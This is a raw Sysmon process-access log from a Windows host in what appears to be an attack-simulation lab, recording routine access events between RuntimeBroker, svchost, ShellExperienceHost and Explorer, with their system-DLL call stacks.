13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405944C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ce7c|C:\Windows\System32\Windows.Storage.dll+dbd39|C:\Windows\System32\Windows.Storage.dll+dbb65|C:\Windows\System32\Windows.Storage.dll+615c6|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000012120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405756C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405936C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405932C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405924C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405928C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.429{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.429{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.429{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.429{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.429{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.429{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.429{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.429{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.429{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.429{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.429{59A5CD1D-93FB-6005-FD04-00000000A301}11561068C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+bf29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 